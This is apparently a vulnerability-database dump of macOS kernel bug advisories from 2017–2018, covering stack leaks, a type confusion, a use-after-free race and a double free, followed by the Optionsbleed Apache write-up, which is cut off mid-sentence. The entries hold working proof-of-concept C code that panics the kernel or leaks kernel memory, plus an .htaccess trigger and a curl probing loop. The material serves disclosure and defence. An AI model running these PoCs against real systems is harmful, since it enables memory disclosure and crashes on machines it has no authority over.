\"<a href=\"https://crrev.com/10\" title=\"\" class=\"\" rel=\"nofollow\">r10</a>\", \"<a href=\"https://crrev.com/8\" title=\"\" class=\"\" rel=\"nofollow\">r8</a>\", \"<a href=\"https://crrev.com/9\" title=\"\" class=\"\" rel=\"nofollow\">r9</a>\" \n); \nprintf(\"retval = %d\\n\", retval); \nprintf(\"ppattr_cpu_attr = 0x%\"PRIx32\"\\n\", attrs.ppattr_cpu_attr); \nprintf(\"ppattr_cpu_percentage = 0x%\"PRIx32\"\\n\", attrs.ppattr_cpu_percentage); \nprintf(\"ppattr_cpu_attr_interval = 0x%\"PRIx64\"\\n\", attrs.ppattr_cpu_attr_interval); \nprintf(\"ppattr_cpu_attr_deadline = 0x%\"PRIx64\"\\n\", attrs.ppattr_cpu_attr_deadline); \n} \n \nint main(void) { \nrun(); \nreturn 0; \n} \n$ gcc -Wall -o test test.c \n$ ./test \nretval = 0 \nppattr_cpu_attr = 0x1a180ccb \nppattr_cpu_percentage = 0x0 \nppattr_cpu_attr_interval = 0x0 \nppattr_cpu_attr_deadline = 0x0 \n \nThat looks like the lower half of a pointer or so. \n \n \nThis bug is subject to a 90 day disclosure deadline. After 90 days elapse \nor a patch has been made broadly available, the bug report will become \nvisible to the public. \n \n \n \n \nFound by: jannh \n \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/145876/GS20180112171756.txt", "cvss": {"score": 5.6, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:COMPLETE/"}}], "seebug": [{"lastseen": "2017-12-25T18:32:41", "description": "When getsockopt() [edited; original report said \"setsockopt\"] is called on any socket with level SOL_SOCKET and optname SO_NECP_ATTRIBUTES, necp_get_socket_attributes is invoked.\r\nnecp_get_socket_attributes() unconditionally calls sotoinpcb(so):\r\n```\r\n errno_t\r\n necp_get_socket_attributes(struct socket *so, struct sockopt *sopt)\r\n {\r\n int error = 0;\r\n u_int8_t *buffer = NULL;\r\n u_int8_t *cursor = NULL;\r\n size_t valsize = 0;\r\n struct inpcb *inp = sotoinpcb(so);\r\n\r\n if (inp->inp_necp_attributes.inp_domain != NULL) {\r\n valsize += sizeof(struct necp_tlv_header) + strlen(inp->inp_necp_attributes.inp_domain);\r\n }\r\n [...]\r\n }\r\n```\r\nsotoinpcb() causes type confusion if so->so_pcb is of an unexpected type (because the socket is not an IPv4/IPv6 socket):\r\n```\r\n #define sotoinpcb(so) ((struct inpcb *)(so)->so_pcb)\r\n```\r\n\r\nIf necp_get_socket_attributes() is called on a UNIX domain socket, this will cause the members of inp->inp_necp_attributes to be read from type-confused, probably also out-of-bounds memory behind the actual so->so_pcb (which is of type `struct unpcb`, which looks much smaller than `struct inpcb`).\r\n\r\n\r\nTo trigger this bug, compile the following code, run it, and cause some system activity, e.g. by launching the browser (the PoC won't crash if so->so_pcb contains NULLs in the right spots).\r\n\r\n```\r\n#include <sys/types.h>\r\n#include <sys/un.h>\r\n#include <sys/socket.h>\r\n#include <err.h>\r\n#include <unistd.h>\r\n\r\n#define SO_NECP_ATTRIBUTES 0x1109\r\n\r\nint main(void) {\r\n while (1) {\r\n int s = socket(AF_UNIX, SOCK_STREAM, 0);\r\n if (s == -1)\r\n err(1, \"socket\");\r\n getsockopt(s, SOL_SOCKET, SO_NECP_ATTRIBUTES, NULL, NULL);\r\n close(s);\r\n }\r\n}\r\n```\r\n\r\nOn macOS 10.13 (17A405), this causes the following crash:\r\n\r\n```\r\n*** Panic Report ***\r\npanic(cpu 2 caller 0xffffff800e78a611): Kernel trap at 0xffffff800e976930, type 14=page fault, registers:\r\nCR0: 0x000000008001003b, CR2: 0x000000fa000000cc, CR3: 0x0000000200037073, CR4: 0x00000000001627e0\r\nRAX: 0x000000fa000000cc, RBX: 0x000000fa000000cb, RCX: 0xffffff800eb90aad, RDX: 0xffffff800eb90dcc\r\nRSP: 0xffffff8018de3e70, RBP: 0xffffff8018de3e90, RSI: 0xffffff8018de3ef0, RDI: 0xffffff8032ac66a8\r\nR8: 0x0000000000000001, R9: 0xffffffff00000000, R10: 0x0000000000000000, R11: 0x0000000000000246\r\nR12: 0xffffff80357cf7d0, R13: 0xffffff8032d69a08, R14: 0xffffff8018de3ef0, R15: 0xffffff8032ac66a8\r\nRFL: 0x0000000000010206, RIP: 0xffffff800e976930, CS: 0x0000000000000008, SS: 0x0000000000000010\r\nFault CR2: 0x000000fa000000cc, Error code: 0x0000000000000000, Fault CPU: 0x2, PL: 0, VF: 1\r\n```\r\n\r\nThis bug should be usable for disclosing kernel memory.", "cvss3": {}, "published": "2017-12-15T00:00:00", "type": "seebug", "title": "MacOS so_pcb type confusion in necp_get_socket_attributes(CVE-2017-13855)", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2017-13855"], "modified": "2017-12-15T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-96989", "id": "SSV:96989", "sourceData": "\n #include <sys/types.h>\r\n#include <sys/un.h>\r\n#include <sys/socket.h>\r\n#include <err.h>\r\n#include <unistd.h>\r\n\r\n#define SO_NECP_ATTRIBUTES 0x1109\r\n\r\nint main(void) {\r\n while (1) {\r\n int s = socket(AF_UNIX, SOCK_STREAM, 0);\r\n if (s == -1)\r\n err(1, \"socket\");\r\n getsockopt(s, SOL_SOCKET, SO_NECP_ATTRIBUTES, NULL, NULL);\r\n close(s);\r\n }\r\n}\n ", "sourceHref": "https://www.seebug.org/vuldb/ssvid-96989", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2017-12-25T18:34:50", "description": "IOTimeSyncClockManagerUserClient provides the userspace interface for the IOTimeSyncClockManager IOService.\r\n\r\nIOTimeSyncClockManagerUserClient overrides the IOUserClient::clientClose method but it treats it like a destructor.\r\nIOUserClient::clientClose is not a destructor and plays no role in the lifetime management of an IOKit object.\r\n\r\nIt is perfectly possible to call ::clientClose (via io_service_close) in one thread and call an external method in another\r\nthread at the same time.\r\n\r\nIOTimeSyncClockManagerUserClient::clientClose drops references on a bunch of OSArrays causing them to be free'd,\r\nit also destroys the locks which are supposed to protect access to those arrays. This leads directly to multiple UaFs\r\nif you also call external methods which manipulate those arrays in other threads.\r\n\r\nFor an exploit some care would be required to ensure correct interleaving such that the OSArray was destroyed and then\r\nused *before* the lock which is supposed to be protecting the array is also destroyed, but it would be quite possible.\r\n\r\nTested on MacOS 10.13 (17A365) on MacBookAir5,2", "cvss3": {}, "published": "2017-12-15T00:00:00", "type": "seebug", "title": "MacOS/iOS multiple kernel UAFs due to incorrect IOKit object lifetime management in IOTimeSyncClockManagerUserClient(CVE-2017-13847)", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2017-13847"], "modified": "2017-12-15T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-96988", "id": "SSV:96988", "sourceData": "\n // ianbeer\r\n// build: clang -o timesync_uaf timesync_uaf.c -framework IOKit -lpthread\r\n// repro: while true; do ./timesync_uaf; done\r\n\r\n#if 0\r\nMacOS multiple kernel UAFs due to incorrect IOKit object lifetime management in IOTimeSyncClockManagerUserClient\r\n\r\nIOTimeSyncClockManagerUserClient provides the userspace interface for the IOTimeSyncClockManager IOService.\r\n\r\nIOTimeSyncClockManagerUserClient overrides the IOUserClient::clientClose method but it treats it like a destructor.\r\nIOUserClient::clientClose is not a destructor and plays no role in the lifetime management of an IOKit object.\r\n\r\nIt is perfectly possible to call ::clientClose (via io_service_close) in one thread and call an external method in another\r\nthread at the same time.\r\n\r\nIOTimeSyncClockManagerUserClient::clientClose drops references on a bunch of OSArrays causing them to be free'd,\r\nit also destroys the locks which are supposed to protect access to those arrays. This leads directly to multiple UaFs\r\nif you also call external methods which manipulate those arrays in other threads.\r\n\r\nFor an exploit some care would be required to ensure correct interleaving such that the OSArray was destroyed and then\r\nused *before* the lock which is supposed to be protecting the array is also destroyed, but it would be quite possible.\r\n\r\nTested on MacOS 10.13 (17A365) on MacBookAir5,2\r\n#endif\r\n\r\n#include <stdio.h>\r\n#include <stdlib.h>\r\n#include <string.h>\r\n#include <pthread.h>\r\n\r\n#include <mach/mach.h>\r\n\r\n#include <IOKit/IOKitLib.h>\r\n\r\nint go = 0;\r\n\r\nvoid* thread_func(void* arg) {\r\n io_object_t conn = (io_object_t)arg;\r\n go = 1;\r\n\r\n IOServiceClose(conn);\r\n return 0;\r\n}\r\n\r\nint main(int argc, char** argv){\r\n kern_return_t err;\r\n\r\n io_service_t service = IOServiceGetMatchingService(kIOMasterPortDefault, IOServiceMatching(\"IOTimeSyncClockManager\"));\r\n\r\n if (service == IO_OBJECT_NULL){\r\n printf(\"unable to find service\\n\");\r\n return 0;\r\n }\r\n\r\n io_connect_t conn = MACH_PORT_NULL;\r\n err = IOServiceOpen(service, mach_task_self(), 0, &conn);\r\n if (err != KERN_SUCCESS){\r\n printf(\"unable to get user client connection\\n\");\r\n return 0;\r\n }\r\n \r\n pthread_t thread;\r\n pthread_create(&thread, NULL, thread_func, (void*)conn);\r\n\r\n while(!go){;}\r\n\r\n uint64_t inputScalar[16]; \r\n uint64_t inputScalarCnt = 0;\r\n\r\n char inputStruct[4096];\r\n size_t inputStructCnt = 0;\r\n\r\n uint64_t outputScalar[16];\r\n uint32_t outputScalarCnt = 1;\r\n\r\n char outputStruct[4096];\r\n size_t outputStructCnt = 0;\r\n \r\n err = IOConnectCallMethod(\r\n conn,\r\n 1,\r\n inputScalar,\r\n inputScalarCnt,\r\n inputStruct,\r\n inputStructCnt,\r\n outputScalar,\r\n &outputScalarCnt,\r\n outputStruct,\r\n &outputStructCnt); \r\n\r\n printf(\"%x\\n\", err);\r\n\r\n return 0;\r\n}\r\n\n ", "sourceHref": "https://www.seebug.org/vuldb/ssvid-96988", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2017-12-25T18:33:48", "description": "For 64-bit processes, the getrusage() syscall handler converts a `struct rusage` to a `struct user64_rusage` using `munge_user64_rusage()`, then copies the `struct user64_rusage` to userspace:\r\n```\r\nint\r\ngetrusage(struct proc *p, struct getrusage_args *uap, __unused int32_t *retval)\r\n{\r\n struct rusage *rup, rubuf;\r\n struct user64_rusage rubuf64;\r\n struct user32_rusage rubuf32;\r\n size_t retsize = sizeof(rubuf); /* default: 32 bits */\r\n caddr_t retbuf = (caddr_t)&rubuf; /* default: 32 bits */\r\n struct timeval utime;\r\n struct timeval stime;\r\n\r\n\r\n switch (uap->who) {\r\n case RUSAGE_SELF:\r\n calcru(p, &utime, &stime, NULL);\r\n proc_lock(p);\r\n rup = &p->p_stats->p_ru;\r\n rup->ru_utime = utime;\r\n rup->ru_stime = stime;\r\n\r\n rubuf = *rup;\r\n proc_unlock(p);\r\n\r\n break;\r\n [...]\r\n }\r\n if (IS_64BIT_PROCESS(p)) {\r\n retsize = sizeof(rubuf64);\r\n retbuf = (caddr_t)&rubuf64;\r\n munge_user64_rusage(&rubuf, &rubuf64);\r\n } else {\r\n [...]\r\n }\r\n\r\n return (copyout(retbuf, uap->rusage, retsize));\r\n}\r\n```\r\n`munge_user64_rusage()` performs the conversion by copying individual fields:\r\n```\r\n__private_extern__ void \r\nmunge_user64_rusage(struct rusage *a_rusage_p, struct user64_rusage *a_user_rusage_p)\r\n{\r\n /* timeval changes size, so utime and stime need special handling */\r\n a_user_rusage_p->ru_utime.tv_sec = a_rusage_p->ru_utime.tv_sec;\r\n a_user_rusage_p->ru_utime.tv_usec = a_rusage_p->ru_utime.tv_usec;\r\n a_user_rusage_p->ru_stime.tv_sec = a_rusage_p->ru_stime.tv_sec;\r\n a_user_rusage_p->ru_stime.tv_usec = a_rusage_p->ru_stime.tv_usec;\r\n[...]\r\n}\r\n```\r\n`struct user64_rusage` contains four bytes of struct padding behind each `tv_usec` element:\r\n```\r\n#define _STRUCT_USER64_TIMEVAL struct user64_timeval\r\n_STRUCT_USER64_TIMEVAL\r\n{\r\n user64_time_t tv_sec; /* seconds */\r\n __int32_t tv_usec; /* and microseconds */\r\n};\r\n\r\nstruct user64_rusage {\r\n struct user64_timeval ru_utime; /* user time used */\r\n struct user64_timeval ru_stime; /* system time used */\r\n user64_long_t ru_maxrss; /* max resident set size */\r\n[...]\r\n};\r\n```\r\nThis padding is not initialized, but is copied to userspace.\r\n\r\n\r\nThe following test results come from a Macmini7,1 running macOS 10.13 (17A405), Darwin 17.0.0.\r\n\r\n\r\nJust leaking stack data from a previous syscall seems to mostly return the upper halfes of some kernel pointers.\r\nThe returned data seems to come from the previous syscall:\r\n```\r\n$ cat test.c\r\n#include <sys/resource.h>\r\n#include <stdio.h>\r\n#include <stdlib.h>\r\n#include <string.h>\r\n#include <fcntl.h>\r\n#include <unistd.h>\r\n\r\nvoid do_leak(void) {\r\n static struct rusage ru;\r\n getrusage(RUSAGE_SELF, &ru);\r\n static unsigned int leak1, leak2;\r\n memcpy(&leak1, ((char*)&ru)+12, 4);\r\n memcpy(&leak1, ((char*)&ru)+28, 4);\r\n printf(\"leak1: 0x%08x\\n\", leak1);\r\n printf(\"leak2: 0x%08x\\n\", leak2);\r\n}\r\n\r\nint main(void) {\r\n do_leak();\r\n do_leak();\r\n do_leak();\r\n int fd = open(\"/dev/null\", O_RDONLY);\r\n do_leak();\r\n int dummy;\r\n read(fd, &dummy, 4);\r\n do_leak();\r\n return 0;\r\n}\r\n```\r\n\r\n```\r\n$ gcc -o test test.c && ./test\r\nleak1: 0x00000000\r\nleak2: 0x00000000\r\nleak1: 0xffffff80\r\nleak2: 0x00000000\r\nleak1: 0xffffff80\r\nleak2: 0x00000000\r\nleak1: 0xffffff80\r\nleak2: 0x00000000\r\nleak1: 0xffffff81\r\nleak2: 0x00000000\r\n```\r\n\r\nHowever, I believe that this can also be used to disclose kernel heap memory.\r\nWhen the stack freelists are empty, stack_alloc_internal() allocates a new kernel stack\r\nwithout zeroing it, so the new stack contains data from previous heap allocations.\r\nThe following testcase, when run after repeatedly reading a wordlist into memory,\r\nleaks some non-pointer data that seems to come from the wordlist:\r\n```\r\n$ cat forktest.c \r\n#include <sys/resource.h>\r\n#include <stdio.h>\r\n#include <stdlib.h>\r\n#include <string.h>\r\n#include <fcntl.h>\r\n#include <unistd.h>\r\n\r\nvoid do_leak(void) {\r\n static struct rusage ru;\r\n getrusage(RUSAGE_SELF, &ru);\r\n static unsigned int leak1, leak2;\r\n memcpy(&leak1, ((char*)&ru)+12, 4);\r\n memcpy(&leak1, ((char*)&ru)+28, 4);\r\n char str[1000];\r\n if (leak1 != 0) {\r\n sprintf(str, \"leak1: 0x%08x\\n\", leak1);\r\n write(1, str, strlen(str));\r\n }\r\n if (leak2 != 0) {\r\n sprintf(str, \"leak2: 0x%08x\\n\", leak2);\r\n write(1, str, strlen(str));\r\n }\r\n}\r\n\r\nvoid leak_in_child(void) {\r\n int res_pid, res2;\r\n asm volatile(\r\n \"mov $0x02000002, %%rax\\n\\t\"\r\n \"syscall\\n\\t\"\r\n : \"=a\"(res_pid), \"=d\"(res2)\r\n :\r\n : \"cc\", \"memory\", \"rcx\", \"r11\"\r\n );\r\n //write(1, \"postfork\\n\", 9);\r\n if (res2 == 1) {\r\n //write(1, \"child\\n\", 6);\r\n do_leak();\r\n char dummy;\r\n read(0, &dummy, 1);\r\n asm volatile(\r\n \"mov $0x02000001, %rax\\n\\t\"\r\n \"mov $0, %rdi\\n\\t\"\r\n \"syscall\\n\\t\"\r\n );\r\n }\r\n //printf(\"fork=%d:%d\\n\", res_pid, res2);\r\n int wait_res;\r\n //wait(&wait_res);\r\n}\r\n\r\nint main(void) {\r\n for(int i=0; i<1000; i++) {\r\n leak_in_child();\r\n }\r\n}\r\n```\r\n\r\n```\r\n$ gcc -o forktest forktest.c && ./forktest\r\nleak1: 0x1b3b1320\r\nleak1: 0x00007f00\r\nleak1: 0x65686375\r\nleak1: 0x410a2d63\r\nleak1: 0x8162ced5\r\nleak1: 0x65736168\r\nleak1: 0x0000042b\r\n```\r\nThe leaked values include the strings \"uche\", \"c-\\nA\" and \"hase\", which could plausibly come from the wordlist.\r\n\r\n\r\nApart from fixing the actual bug here, it might also make sense to zero stacks when stack_alloc_internal() grabs pages from the generic allocator with kernel_memory_allocate() (by adding KMA_ZERO or so). As far as I can tell, that codepath should only be executed very rarely under normal circumstances, and this change should at least break the trick of leaking heap contents through the stack.", "cvss3": {}, "published": "2017-12-15T00:00:00", "type": "seebug", "title": "MacOS getrusage stack leak through struct padding(CVE-2017-13869)", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2017-13869"], "modified": "2017-12-15T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-96990", "id": "SSV:96990", "sourceData": "", "sourceHref": "", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2017-12-25T18:34:22", "description": "SO_FLOW_DIVERT_TOKEN is a socket option on the `SOL_SOCKET`layer. It's implemented by\r\n```\r\n flow_divert_token_set(struct socket *so, struct sockopt *sopt)\r\n\r\nin flow_divert.c.\r\n\r\nThe relevant code is:\r\n\r\n error = soopt_getm(sopt, &token);\r\n if (error) {\r\n goto done;\r\n }\r\n \r\n error = soopt_mcopyin(sopt, token);\r\n if (error) {\r\n goto done;\r\n }\r\n\r\n...\r\n\r\ndone:\r\n if (token != NULL) {\r\n mbuf_freem(token);\r\n }\r\n```\r\n`soopt_getm` allocates an mbuf.\r\n\r\n`soopt_mcopyin`, which should copyin the data for the mbuf from userspace, has the following code:\r\n```\r\n error = copyin(sopt->sopt_val, mtod(m, char *),\r\n m->m_len);\r\n if (error != 0) {\r\n m_freem(m0);\r\n return (error);\r\n }\r\n```\r\nThis means that if the copyin fails, by for example providing an invalid userspace pointer, soopt_mcopyin\r\nwill free the mbuf. `flow_divert_token_set` isn't aware of these semantics and if it sees that soopt_mcopyin\r\nreturns an error it also calls mbuf_freem on that same mbuf which `soopy_mcopyin` already freed.\r\n\r\nmbufs are aggressivly cached but with sufficiently full caches m_freem will eventually fall through to freeing\r\nback to a zalloc zone, and that zone could potentially be garbage collected leading to the ability to actually\r\nexploit such an issue.\r\n\r\nThis PoC will just hit a panic inside m_free when it detects a double-free but do note that this cannot detect\r\nall double frees and this issue is still exploitable with sufficient grooming/cache manipulation.\r\n\r\nTested on MacOS 10.13 (17A365) on MacBookAir5,2", "cvss3": {}, "published": "2017-12-15T00:00:00", "type": "seebug", "title": "MacOS/iOS kernel double free due to incorrect API usage in flow divert socket option handling(CVE-2017-13867)", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2017-13867"], "modified": "2017-12-15T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-96986", "id": "SSV:96986", "sourceData": "\n // ianbeer\r\n\r\n#if 0\r\nMacOS/iOS kernel double free due to incorrect API usage in flow divert socket option handling\r\n\r\nSO_FLOW_DIVERT_TOKEN is a socket option on the SOL_SOCKET layer. It's implemented by\r\n\r\n flow_divert_token_set(struct socket *so, struct sockopt *sopt)\r\n\r\nin flow_divert.c.\r\n\r\nThe relevant code is:\r\n\r\n error = soopt_getm(sopt, &token);\r\n if (error) {\r\n goto done;\r\n }\r\n \r\n error = soopt_mcopyin(sopt, token);\r\n if (error) {\r\n goto done;\r\n }\r\n\r\n...\r\n\r\ndone:\r\n if (token != NULL) {\r\n mbuf_freem(token);\r\n }\r\n\r\nsoopt_getm allocates an mbuf.\r\n\r\nsoopt_mcopyin, which should copyin the data for the mbuf from userspace, has the following code:\r\n\r\n\t\t\terror = copyin(sopt->sopt_val, mtod(m, char *),\r\n\t\t\t m->m_len);\r\n\t\t\tif (error != 0) {\r\n\t\t\t\tm_freem(m0);\r\n\t\t\t\treturn (error);\r\n\t\t\t}\r\n\r\nThis means that if the copyin fails, by for example providing an invalid userspace pointer, soopt_mcopyin\r\nwill free the mbuf. flow_divert_token_set isn't aware of these semantics and if it sees that soopt_mcopyin\r\nreturns an error it also calls mbuf_freem on that same mbuf which soopy_mcopyin already freed.\r\n\r\nmbufs are aggressivly cached but with sufficiently full caches m_freem will eventually fall through to freeing\r\nback to a zalloc zone, and that zone could potentially be garbage collected leading to the ability to actually\r\nexploit such an issue.\r\n\r\nThis PoC will just hit a panic inside m_free when it detects a double-free but do note that this cannot detect\r\nall double frees and this issue is still exploitable with sufficient grooming/cache manipulation.\r\n\r\nTested on MacOS 10.13 (17A365) on MacBookAir5,2\r\n#endif\r\n\r\n#include <stdlib.h>\r\n#include <stdio.h>\r\n\r\n#include <sys/socket.h>\r\n\r\nint main() {\r\n int sock = socket(PF_INET, SOCK_DGRAM, 0);\r\n if (socket < 0) {\r\n printf(\"failed to create socket\\n\");\r\n return 0;\r\n }\r\n\r\n printf(\"socket: %d\\n\", sock);\r\n\r\n setsockopt(sock, SOL_SOCKET, 0x1106, (void*)424242424242, 100);\r\n\r\n return 0;\r\n}\r\n\n ", "sourceHref": "https://www.seebug.org/vuldb/ssvid-96986", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2018-01-22T18:26:47", "description": "The syscall\r\nprocess_policy(scope=PROC_POLICY_SCOPE_PROCESS, action=PROC_POLICY_ACTION_GET, policy=PROC_POLICY_RESOURCE_USAGE, policy_subtype=PROC_POLICY_RUSAGE_CPU, attrp=<userbuf>, target_pid=0, target_threadid=<ignored>)\r\ncauses 4 bytes of uninitialized kernel stack memory to be written to userspace.\r\n\r\nThe call graph looks as follows:\r\n```\r\nprocess_policy\r\n handle_cpuuse\r\n proc_get_task_ruse_cpu\r\n task_get_cpuusage\r\n [writes scope=1/2/4/0]\r\n [always returns zero]\r\n [writes policyp if scope!=0]\r\n [always returns zero]\r\n copyout\r\n```\r\n\r\nIf task_get_cpuusage() set `*scope=0` because none of the flags\r\nTASK_RUSECPU_FLAGS_PERTHR_LIMIT, TASK_RUSECPU_FLAGS_PROC_LIMIT and TASK_RUSECPU_FLAGS_DEADLINE are set in task->rusage_cpu_flags,\r\nproc_get_task_ruse_cpu() does not write anything into `*policyp`, meaning that `cpuattr.ppattr_cpu_attr` in\r\nhandle_cpuuse() remains uninitialized. task_get_cpuusage() and proc_get_task_ruse_cpu() always return zero,\r\nso handle_cpuuse() will copy `cpuattr`, including the unititialized `ppattr_cpu_attr` field, to userspace.\r\n\r\n\r\nTested on a Macmini7,1 running macOS 10.13 (17A405), Darwin 17.0.0:\r\n```\r\n$ cat test.c\r\n#include <stdint.h>\r\n#include <stdio.h>\r\n#include <inttypes.h>\r\n\r\nstruct proc_policy_cpuusage_attr {\r\n uint32_t ppattr_cpu_attr;\r\n uint32_t ppattr_cpu_percentage;\r\n uint64_t ppattr_cpu_attr_interval;\r\n uint64_t ppattr_cpu_attr_deadline;\r\n};\r\n\r\nvoid run(void) {\r\n int retval;\r\n struct proc_policy_cpuusage_attr attrs = {0,0,0,0};\r\n asm volatile(\r\n \"mov $0x02000143, %%rax\\n\\t\" // process_policy\r\n \"mov $1, %%rdi\\n\\t\" // PROC_POLICY_SCOPE_PROCESS\r\n \"mov $11, %%rsi\\n\\t\" // PROC_POLICY_ACTION_GET\r\n \"mov $4, %%rdx\\n\\t\" // PROC_POLICY_RESOURCE_USAGE\r\n \"mov $3, %%r10\\n\\t\" // PROC_POLICY_RUSAGE_CPU\r\n \"mov %[userptr], %%r8\\n\\t\"\r\n \"mov $0, %%r9\\n\\t\" // PID 0 (self)\r\n // target_threadid is unused\r\n \"syscall\\n\\t\"\r\n : //out\r\n \"=a\"(retval)\r\n : //in\r\n [userptr] \"r\"(&attrs)\r\n : //clobber\r\n \"cc\", \"memory\", \"rdi\", \"rsi\", \"rdx\", \"r10\", \"r8\", \"r9\"\r\n );\r\n printf(\"retval = %d\\n\", retval);\r\n printf(\"ppattr_cpu_attr = 0x%\"PRIx32\"\\n\", attrs.ppattr_cpu_attr);\r\n printf(\"ppattr_cpu_percentage = 0x%\"PRIx32\"\\n\", attrs.ppattr_cpu_percentage);\r\n printf(\"ppattr_cpu_attr_interval = 0x%\"PRIx64\"\\n\", attrs.ppattr_cpu_attr_interval);\r\n printf(\"ppattr_cpu_attr_deadline = 0x%\"PRIx64\"\\n\", attrs.ppattr_cpu_attr_deadline);\r\n}\r\n\r\nint main(void) {\r\n run();\r\n return 0;\r\n}\r\n$ gcc -Wall -o test test.c\r\n$ ./test\r\nretval = 0\r\nppattr_cpu_attr = 0x1a180ccb\r\nppattr_cpu_percentage = 0x0\r\nppattr_cpu_attr_interval = 0x0\r\nppattr_cpu_attr_deadline = 0x0\r\n```\r\nThat looks like the lower half of a pointer or so.", "cvss3": {}, "published": "2018-01-22T00:00:00", "title": "MacOS process_policy stack leak through uninitialized field(CVE-2017-7154)", "type": "seebug", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2017-7154"], "modified": "2018-01-22T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-97093", "id": "SSV:97093", "sourceData": "", "sourceHref": "", "cvss": {"score": 5.6, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:COMPLETE/"}}, {"lastseen": "2017-11-19T12:01:02", "description": "If you're using the HTTP protocol in everday Internet use you are usually only using two of its methods: GET and POST. However HTTP has a number of other methods, so I wondered what you can do with them and if there are any vulnerabilities.\r\n\r\nOne HTTP method is called OPTIONS. It simply allows asking a server which other HTTP methods it supports. The server answers with the \"Allow\" header and gives us a comma separated list of supported methods.\r\n\r\nA scan of the Alexa Top 1 Million revealed something strange: Plenty of servers sent out an \"Allow\" header with what looked like corrupted data. Some examples:\r\n```\r\nAllow: ,GET,,,POST,OPTIONS,HEAD,,\r\nAllow: POST,OPTIONS,,HEAD,:09:44 GMT\r\nAllow: GET,HEAD,OPTIONS,,HEAD,,HEAD,,HEAD,, HEAD,,HEAD,,HEAD,,HEAD,POST,,HEAD,, HEAD,!DOCTYPE html PUBLIC \"-//W3C//DTD XHTML 1.0 Transitional//EN\" \"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd\"\r\nAllow: GET,HEAD,OPTIONS,=write HTTP/1.0,HEAD,,HEAD,POST,,HEAD,TRACE\r\n```\r\n![](https://images.seebug.org/1505800657517)\r\n\r\n\r\nThat clearly looked interesting - and dangerous. It suspiciously looked like a \"bleed\"-style bug, which has become a name for bugs where arbitrary pieces of memory are leaked to a potential attacker. However these were random servers on the Internet, so at first I didn't know what software was causing this.\r\n\r\nSometimes HTTP servers send a \"Server\" header telling the software. However one needs to be aware that the \"Server\" header can lie. It's quite common to have one HTTP server proxying another. I got all kinds of different \"Server\" headers back, but I very much suspected that these were all from the same bug.\r\n\r\nI tried to contact the affected server operators, but only one of them answered, and he was extremely reluctant to tell me anything about his setup, so that wasn't very helpful either.\r\n\r\nHowever I got one clue: Some of the corrupted headers contained strings that were clearly configuration options from Apache. It seemed quite unlikely that those would show up in the memory of other server software. But I was unable to reproduce anything alike on my own Apache servers. I also tried reading the code that put together the Allow header to see if I can find any clues, but with no success. So without knowing any details I contacted the Apache security team.\r\n\r\nFortunately Apache developer Jacob Champion digged into it and figured out what was going on: Apache supports a configuration directive Limit that allows restricting access to certain HTTP methods to a specific user. And if one sets the [Limit](https://httpd.apache.org/docs/2.4/mod/core.html#limit) directive in an .htaccess file for an HTTP method that's not globally registered in the server then the corruption happens. After that I was able to reproduce it myself. Setting a Limit directive for any invalid HTTP method in an .htaccess file caused a use after free error in the construction of the Allow header which was also [detectable with Address Sanitizer](https://blog.fuzzing-project.org/uploads/optionsbleed-asan.txt). (However ASAN doesn't work reliable due to the memory allocation abstraction done by APR.)\r\n\r\n### FAQ\r\n\r\n#### What's Optionsbleed?\r\n\r\nOptionsbleed is a use after free error in Apache HTTP that causes a corrupted Allow header to be constructed in response to HTTP OPTIONS requests. This can leak pieces of arbitrary memory from the server process that may contain secrets. The memory pieces change after multiple requests, so for a vulnerable host an arbitrary number of memory chunks can be leaked.\r\n\r\nThe bug appears if a webmaster tries to use the \"Limit\" directive with an invalid HTTP method.\r\n\r\nExample `.htaccess`:\r\n```\r\n<Limit abcxyz>\r\n</Limit>\r\n```\r\n\r\n#### How prevalent is it?\r\n\r\nScanning the Alexa Top 1 Million revealed 466 hosts with corrupted Allow headers. In theory it's possible that other server software has similar bugs. On the other hand this bug is nondeterministic, so not all vulnerable hosts may have been catched.\r\n\r\n#### So it only happens if you set a quite unusual configuration option?\r\n\r\nThere's an additional risk in shared hosting environments. The corruption is not limited to a single virtual host. One customer of a shared hosting provider could deliberately create an .htaccess file causing this corruption hoping to be able to extract secret data from other hosts on the same system.\r\n\r\n#### I can't reproduce it!\r\n\r\nDue to its nature the bug doesn't appear deterministically. It only seems to appear on busy servers. Sometimes it only appears after multiple requests.\r\n\r\n#### Does it have a CVE?\r\n\r\n[CVE-2017-9798](https://nvd.nist.gov/vuln/detail/CVE-2017-9798).\r\n\r\n#### I'm seeing Allow headers containing HEAD multiple times!\r\n\r\nThis is actually a different Apache bug ([#61207](https://bz.apache.org/bugzilla/show_bug.cgi?id=61207)) that I found during this investigation. It causes HEAD to appear three times instead of once. However it's harmless and not a security bug.\r\n\r\nLaunchpad also has [a harmless bug that produces a malformed Allow header](https://bugs.launchpad.net/launchpad/+bug/1717682), using a space-separated list instead of a comma-separated one.\r\n\r\n#### How can I test it?\r\n\r\nA simple way is to use Curl in a loop and send OPTIONS requests:\r\n```\r\nfor i in {1..100}; do curl -sI -X OPTIONS https://www.google.com/|grep -i \"allow:\"; done\r\n```\r\nDepending on the server configuration it may not answer to OPTIONS requests on some URLs. Try different paths, HTTP versus HTTPS hosts, non-www versus www etc. may lead to different results.\r\n\r\nPlease note that this bug does not show up with the \"*\" OPTIONS target, you need a specific path.\r\n\r\nHere's a [python proof of concept script](https://github.com/hannob/optionsbleed).\r\n\r\n#### What shall I do?\r\n\r\nIf you run an Apache web server you should update. Most distributions should have updated packages by now or very 